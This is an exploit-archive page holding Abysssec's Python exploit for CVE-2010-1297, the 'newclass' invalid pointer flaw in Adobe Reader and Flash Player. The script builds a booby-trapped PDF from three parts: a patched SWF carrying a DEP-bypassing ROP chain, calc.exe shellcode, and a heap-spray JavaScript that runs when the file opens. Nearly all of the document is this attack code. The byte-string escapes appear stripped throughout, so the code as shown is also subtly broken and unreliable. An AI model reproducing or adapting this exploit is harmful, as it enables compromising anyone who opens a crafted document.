[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MOAUB #1 - Adobe Acrobat Reader and Flash Player ”°newclass”± invalid pointer
# Published : 2010-09-01
# Author : Abysssec
# Previous Title : TFTPDWIN v0.4.2 Directory Traversal Vulnerability
# Next Title : Trend Micro Internet Security Pro 2010 ActiveX extSetOwner Remote Code Execution
'''
__ __ ____ _ _ ____
| / |/ __ / | | | | _
| / | | | | / | | | | |_) |
| |/| | | | |/ / | | | | _ < Day 1 (Binary Analysis)
| | | | |__| / ____ |__| | |_) |
|_| |_|____/_/ _____/|____/
http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/
http://www.exploit-db.com/sploits/moaub1-adobe-newclass.tar.gz
Title : Adobe Acrobat Reader and Flash Player ”°newclass”± invalid pointer vulnerability
Analysis : http://www.abysssec.com
Vendor : http://www.adobe.com
Impact : Ciritical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1297
MOAUB Number : MOAUB-01-BA
'''
import sys
class PDF:
def __init__(self):
self.xrefs = []
self.eol = 'x0a'
self.content = ''
self.xrefs_offset = 0
def header(self):
self.content += '%PDF-1.6' + self.eol
def obj(self, obj_num, data,flag):
self.xrefs.append(len(self.content))
self.content += '%d 0 obj' % obj_num
if flag == 1:
self.content += self.eol + '<< ' + data + ' >>' + self.eol
else:
self.content += self.eol + data + self.eol
self.content += 'endobj' + self.eol
def obj_SWFStream(self, obj_num, data, stream):
self.xrefs.append(len(self.content))
self.content += '%d 0 obj' % obj_num
self.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream))
self.content += ' >>' + self.eol
self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol
self.content += 'endobj' + self.eol
def obj_Stream(self, obj_num, data, stream):
self.xrefs.append(len(self.content))
self.content += '%d 0 obj' % obj_num
self.content += self.eol + '<< ' + data + '/Length %d' %len(stream)
self.content += ' >>' + self.eol
self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol
self.content += 'endobj' + self.eol
def ref(self, ref_num):
return '%d 0 R' % ref_num
def xref(self):
self.xrefs_offset = len(self.content)
self.content += 'xref' + self.eol
self.content += '0 %d' % (len(self.xrefs) + 1)
self.content += self.eol
self.content += '0000000000 65535 f' + self.eol
for i in self.xrefs:
self.content += '%010d 00000 n' % i
self.content += self.eol
def trailer(self):
self.content += 'trailer' + self.eol
self.content += '<< /Size %d' % (len(self.xrefs) + 1)
self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol
self.content += 'startxref' + self.eol
self.content += '%d' % self.xrefs_offset
self.content += self.eol
self.content += '%%EOF'
def generate(self):
return self.content
class Exploit:
def convert_to_utf16(self, payload):
enc_payload = ''
for i in range(0, len(payload), 2):
num = 0
for j in range(0, 2):
num += (ord(payload[i + j]) & 0xff) << (j * 8)
enc_payload += '%%u%04x' % num
return enc_payload
def get_payload(self):
# shellcode calc.exe
payload =("x90x90x90x89xE5xD9xEExD9x75xF4x5Ex56x59x49x49x49x49x49x49x49x49x49x49"
"x43x43x43x43x43x43x37x51x5Ax6Ax41x58x50x30x41x30x41x6Bx41x41x51x32x41x42x32x42x42x30x42x42x41"
"x42x58x50x38x41x42x75x4Ax49x4Bx4Cx4Bx58x51x54x43x30x43x30x45x50x4Cx4Bx51x55x47x4Cx4Cx4Bx43x4C"
"x43x35x44x38x45x51x4Ax4Fx4Cx4Bx50x4Fx44x58x4Cx4Bx51x4Fx47x50x45x51x4Ax4Bx51x59x4Cx4Bx46x54x4C"
"x4Bx43x31x4Ax4Ex46x51x49x50x4Ax39x4Ex4Cx4Cx44x49x50x42x54x45x57x49x51x48x4Ax44x4Dx45x51x49x52"
"x4Ax4Bx4Bx44x47x4Bx46x34x46x44x45x54x43x45x4Ax45x4Cx4Bx51x4Fx47x54x43x31x4Ax4Bx43x56x4Cx4Bx44"
"x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4Cx4Cx4Bx43x31x4Ax4Bx4Cx49x51x4Cx47x54x45x54"
"x48x43x51x4Fx46x51x4Cx36x43x50x46x36x45x34x4Cx4Bx50x46x50x30x4Cx4Bx47x30x44x4Cx4Cx4Bx44x30x45"
"x4Cx4Ex4Dx4Cx4Bx42x48x44x48x4Dx59x4Bx48x4Bx33x49x50x43x5Ax46x30x45x38x4Cx30x4Cx4Ax45x54x51x4F"
"x42x48x4Dx48x4Bx4Ex4Dx5Ax44x4Ex50x57x4Bx4Fx4Ax47x43x53x47x4Ax51x4Cx50x57x51x59x50x4Ex50x44x50"
"x4Fx46x37x50x53x51x4Cx43x43x42x59x44x33x43x44x43x55x42x4Dx50x33x50x32x51x4Cx42x43x45x31x42x4C"
"x42x43x46x4Ex45x35x44x38x42x45x43x30x41x41")
return payload
def getSWF(self):
try:
#swfFile = sys.argv[2]
fdR = open('flash.swf', 'rb+')
strTotal = fdR.read()
str1 = strTotal[:88]
addr1 = 'x06xa6x17x30' # addr = 0c0c0c0c
str2 = strTotal[92:533]
#*************************** Bypass DEP by VirtualProtect ********************************
rop = ''
rop += "x77xFAx44x7E" # mov edi,esp ret 4
rop += "x94x28xc2x77" #add esp,20 pop ebp ret
rop += "AAAA" #padding
rop += "xD4x1Ax80x7C" # VirtualProtect
rop += "BBBB" # Ret Addr for VirtualProtect
rop += "CCCC" # Param1 (lpAddress)
rop += "DDDD" # Param2 (Size)
rop += "EEEE" # Param3 (flNewProtect)
rop += "x10xB0xEFx77" # Param4 (Writable Address)
rop += "AAAAAAAAAAAA" #padding
rop += "xC2x4DxC3x77" #mov eax,edi pop esi ret
rop += "AAAA" #padding
rop += "xF2xE1x12x06" #add eax,94 ret
rop += "x70xDCxEEx77" #push esp pop ebp ret4
rop += "x16x9Ax94x7C" #mov [ebp-30],eax ret
rop += "AAAA" #padding
rop += "xC2x4DxC3x77" #mov eax,edi pop esi ret
rop += "AAAA" #padding
rop += "xF2xE1x12x06" #add eax,94 ret
rop += "x79x9Ex83x7C" #mov [ebp-2c],eax ret
rop += "x27x56xEAx77" #mov eax,6b3 ret
rop += "x14x83xE0x77" #mov [ebp-28],eax ret
rop += "xB4x01xF2x77" #xor eax,eax ret
rop += "x88x41x97x7C" #add eax,40 pop ebp ret
rop += "AAAA" #padding
rop += "x70xDCxEEx77" #push esp pop ebp ret4
rop += "xC0x9ExEFx77" #mov [ebp-54],eax ret
rop += "AAAA" #padding
rop += "xC2x4DxC3x77" #mov eax,edi pop esi ret
rop += "AAAA" #padding
rop += "xC1xF2xC1x77" #add eax,8 ret
rop += "xCFx97xDEx77" #xchg eax,esp ret
str3 = strTotal[669:1249]
alignESP = "x83xc4x03"
sc = self.get_payload()
if len(sc) > 2118:
print "[*] Error : payload length is long"
return
if len(sc) <= 2118:
dif = 2118 - len(sc)
while dif > 0 :
sc += 'x90'
dif = dif - 1
str4 = strTotal[3370:3726]
addr2 = 'xF2x3Dx8Dx23' # Enter 0C75 , 81 RET
str5 = strTotal[3730:]
fdW= open('exploit.swf', 'wb+')
finalStr = str1+addr1+str2+rop+str3+alignESP+sc+str4+addr2+str5
fdW.write(finalStr)
#strTotal = open('exploit.swf', 'rb+').read()
fdW.close()
fdR.close()
return finalStr
except IOError:
print '[*] Error : An IO error has occurred'
def HeapSpray(self):
spray = '''
function spray_heap()
{
var chunk_size, payload, nopsled;
chunk_size = 0x1A0000;
pointers = unescape("%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030");
pointerSled = unescape("<Contents>");
while (pointerSled.length < chunk_size)
pointerSled += pointerSled;
pointerSled_len = chunk_size - (pointers.length + 20);
pointerSled = pointerSled.substring(0, pointerSled_len);
heap_chunks = new Array();
for (var i = 0 ; i < <CHUNKS> ; i++)
heap_chunks[i] = pointerSled + pointers;
}
spray_heap();
'''
spray = spray.replace('<Contents>', '%u33dd%u3030') # Pointer to XCHG ESP , EBX
'''
Authplay.dll
303033DD ? 87DC XCHG ESP,EBX
#############################################################
will do nothing
303033DF ? 45 INC EBP
303033E0 ? 05 00898784 ADD EAX,84878900
303033E5 ? 42 INC EDX
303033E6 ? 05 008987E8 ADD EAX,E8878900
303033EB ? 41 INC ECX
303033EC ? 05 008987EC ADD EAX,EC878900
303033F1 ? 41 INC ECX
303033F2 ? 05 008987F0 ADD EAX,F0878900
303033F7 ? 41 INC ECX
303033F8 ? 05 008987F4 ADD EAX,F4878900
303033FD ? 41 INC ECX
303033FE ? 05 005F5E5D ADD EAX,5D5E5F00
30303403 . B8 01000000 MOV EAX,1
30303408 . 5B POP EBX
############################################################
30303409 . 83C4 30 ADD ESP,30
3030340C . C3 RETN
'''
spray = spray.replace('<CHUNKS>', '40') #Chunk count
return spray
def generate_pdf():
exploit = Exploit()
swfFile = 'exploit.swf'
pdf = PDF()
pdf.header()
pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) + ' /OpenAction ' + pdf.ref(17),1)
#pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1)
pdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1)
pdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + " /Type/Page"+' /Contents '+pdf.ref(4) ,1)
pdf.obj_Stream(4, '','')
pdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1)
pdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1)
pdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1)
pdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1)
pdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1)
pdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1)
pdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1)
pdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1)
pdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1)
pdf.obj_SWFStream(14, ' /Type /EmbeddedFile ',exploit.getSWF() )
pdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1)
pdf.obj_Stream(16, '<</Length 0 >> ','')
pdf.obj(17, '/Type /Action /S /JavaScript /JS (%s)' % exploit.HeapSpray(),1)
pdf.xref()
pdf.trailer()
return pdf.generate()
def main():
if len(sys.argv) != 2:
print 'Usage: python %s [output file name]' % sys.argv[0]
sys.exit(0)
file_name = sys.argv[1]
if not file_name.endswith('.pdf'):
file_name = file_name + '.pdf'
try:
fd = open(file_name, 'wb+')
fd.write(generate_pdf())
fd.close()
print '[-] PDF file generated and written to %s' % file_name
except IOError:
print '[*] Error : An IO error has occurred'
print '[-] Exiting ...'
sys.exit(-1)
if __name__ == '__main__':
main()